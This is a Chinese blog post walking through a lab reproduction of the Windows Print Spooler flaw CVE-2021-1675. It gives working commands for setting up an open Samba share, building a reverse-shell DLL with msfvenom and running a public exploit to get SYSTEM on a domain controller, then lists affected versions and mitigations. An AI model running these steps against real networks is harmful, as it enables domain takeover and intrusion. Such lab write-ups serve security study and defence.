Windows Print Spooler CVE-2021-1675 漏洞复现

最新推荐文章于 2024-05-14 12:38:09 发布
最新推荐文章于 2024-05-14 12:38:09 发布
阅读量671 收藏 5
点赞数
分类专栏: 漏洞利用复现 文章标签: python 安全漏洞 脚本语言 linux windows 10
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p01son/article/details/118992584
版权

Windows Print Spooler CVE-2021-1675 漏洞复现

Created: July 7, 2021 5:25 PM

漏洞描述

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

利用条件

域环境 域内用户 开启Spooler打印功能

复现环境

在这里插入图片描述
域控:Windows server 2016 IP:192.168.10.10
攻击机:Kali 2020 IP:192.168.10.2

漏洞利用

0X01. 添加域控的普通账号。

在这里插入图片描述

0X02. 由于Kali中impacket版本过低需安装更高版本的impacket网络协议工具包

> sudo pip3 uninstall impacket
git clone [https://github.com.cnpmjs.org/cube0x0/impacket](https://github.com.cnpmjs.org/cube0x0/impacket)
cd impacket
sudo python3 ./setup.py install

0X03. 攻击机需开启SMB服务并创建共享目录tmp,以便上传木马至域控中

在Kali中编辑 ”/etc/samba/smb.conf" ,修改以下配置

> [global]
workgroup = WORKGROUP
log file = /var/log/samba/log.%m
max log size = 1000
security = user
server role = standalone server
map to guest = bad user
usershare allow guests = yes
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

重启SMB服务

 > systemctl restart smbd.service

测试Kali上的SMB服务能否访问

在这里插入图片描述

0X04. 通过impacket中的rpcdump.py扫描目标机是否存在漏洞

> python3 rpcdump.py @192.168.10.10 | grep MS-RPRN

如图所示,工具扫描结果显示服务器经过扫描存在漏洞

在这里插入图片描述

0X05. 在共享目录tmp下通过msfvenom生成.dll文件木马

  > msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll

在这里插入图片描述

0X06. 通过MSF中的"exploit/multi/handler"监听模块,建立监听

在这里插入图片描述

0X07. 通过使用EXP进行利用

> EXP:[https://github.com/cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675)

> python3 CVE-2021-1675.py vu1n:Passw0rd@192.168.10.10 '\\192.168.10.2\smb\reverse.dll'

在这里插入图片描述

0X08. 成功反弹shell并获取到域控system权限,利用成功。

在这里插入图片描述

0X09. 在受害机中可以通过"Process Hacker"查看相关的进程

在这里插入图片描述

在这里插入图片描述

0X10. 利用成功之后spooler服务会自动关闭

在这里插入图片描述

影响范围

> Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems

安全建议

安装微软CVE-2021-1675漏洞补丁

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

在服务应用(services.msc)中找到Print Spooler服务,将“启动类型”修改为“禁用”

参考

9.利用msfvenom生成木马

MSFvenom | Offensive Security

cube0x0/CVE-2021-1675

CVE-2021-1675 Windows Spooler Service RCE

p01son
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2418
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print SpoolerWindows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
qq_53579360的博客
11-22 1312
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
2024年最全超详细Impacket官方使用指南(1),2024年最新2024HarmonyOS鸿蒙常见面试题分享
最新发布
2401_84862386的博客
05-14 951
对于ntlmrelayx.py你还需要安装ldapdomaindump,flask并ldap3如果你在Windows下,你将需要安装 pyReadline最近发布的Impacket安装为了安装源,请从解压缩Impacket包的目录中执行以下命令:pip install . 这将把类安装到默认的Python模块路径中;请注意,您可能需要特殊的权限才能在那里进行写入。有关setup.py中可用的命令和选项的详细信息,请运行python setup.py --help-commands。
漏洞复现PrintNightmare(CVE-2021-1675复现
weixin_42282189的博客
01-05 5310
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print SpoolerWindows打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 环境准备 一个普通权限的域账户 目标开启.
Windows Print Spooler远程代码执行漏洞复现CVE-2021-1675
yangbz123的博客
07-05 4881
目录漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接 漏洞概述 Windows Print SpoolerWindows打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该
cve-2021-1675复现
Shanfenglan's blog
07-08 1826
文章目录1. 参考文章2. 环境配置2.1 samba配置2.2 特殊的impacket配置3. 漏洞复现3.1 使用msf生成恶意dll并开启监听3.2 上传恶意dll到共享文件夹内3.3 使用exp进行利用4. 利用成果: 1. 参考文章 CentOS7搭建Samba共享文件夹 设置无密码登录 exp: cube0x0/CVE-2021-1675 2. 环境配置 2.1 samba配置 需要有一台linux机器,配置可无密码访问的共享文件夹。 下载samba: apt-get install samba
cve-2020-1337-poc:CVE-2020-1337的poc(Windows打印后台处理程序特权提升)
03-21
CVE-2020-1337是一个严重安全漏洞,影响了Microsoft Windows操作系统中的打印后台处理程序服务(Spooler Service)。这个漏洞允许攻击者在目标系统上提升权限,从非管理员权限升级到系统权限,从而可以执行任意代码...
CVE-2020-1337:CVE-2020-1048旁路
03-09
Microsoft通过 (Windows Spooler漏洞,允许在Windows 7及更高版本上提升特权)认可了Peleg Hadar( )和Tomer Bar( )。 Alex Ionescu( )和Yarden Shafir( )在他很酷的博客中披露了一些详细信息。 利用这些...
PPR Print Spooler-开源
07-03
PPR 是 PostScript 打印机的假脱机程序。 它支持 PPD 文件,并提供操作员警报、作业结果消息和错误恢复。 它与 Netatalk、CAP60、Samba 和 Ghostscript 集成。 它有命令行和网络界面。
fix print spooler v2.60.zip
12-31
"fix print spooler v2.60.zip" 是一个针对Windows操作系统的打印问题修复工具,版本号为2.6.0。这个压缩包包含了专为解决“Print Spooler”服务故障而设计的程序或脚本。Print SpoolerWindows系统中一个至关重要...
print_spooler无法启动或自动停止解决办法.docx
02-23
Windows系统中,Print Spooler服务负责管理和调度所有打印任务。如果该服务出现问题,比如无法启动或总是无故停止,将直接影响到用户的正常打印操作。本文将详细介绍如何解决这些问题。 #### 一、问题背景与原理 ...
微软通杀漏洞-CVE-2021-1675复现
Ms08067安全实验室
08-19 2410
文章来源|MS08067安全实验室本文作者:龙诺(Web知识星球追洞小组)一 准备环境实验环境:windows2019 (192.168.189.145) kali linux (192...
Windows Print Spooler 被曝未修复 0day,可导致恶意软件以管理员权限运行
smellycat000的专栏
08-07 540
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队研究人员找到绕过Windows打印服务漏洞CVE-2020-1048补丁的方法,可导致攻击者以提升后的权限执行恶意代码...
【技术分享】cve-2021-1675-windows提权复现以及详细分析
weixin_45062925的博客
05-24 835
1、漏洞描述 Windows Print SpoolerWindows打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 Github公布的地址...
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5116
CVE-2021-1675
Windows Print Spooler服务最新漏洞CVE-2024-34527详解
m0_61043185的博客
04-12 364
据Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)在最初公开的exp README里描述,spooler漏洞最初用于10年前的震网(Stuxnet)攻击,10年间spooler模块也被披露了许多漏洞,但不知是因为微软补丁修复的不彻底还是spooler模块本身实现起来的复杂性导致了CVE-2021-1675CVE-2021-34527的出现。微软已于2021.7.7发布了一个紧急安全更新补丁,希望微软的这个补丁能使spooler更安全一些吧。
CVE-2021-34527漏洞提权
05-12
CVE-2021-34527,也被称为PrintNightmare漏洞,是一个Windows Print Spooler服务中的安全漏洞,影响了Windows 7、Windows Server 2008、Windows Server 2012和Windows Server 2016等操作系统版本。攻击者可以利用这...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值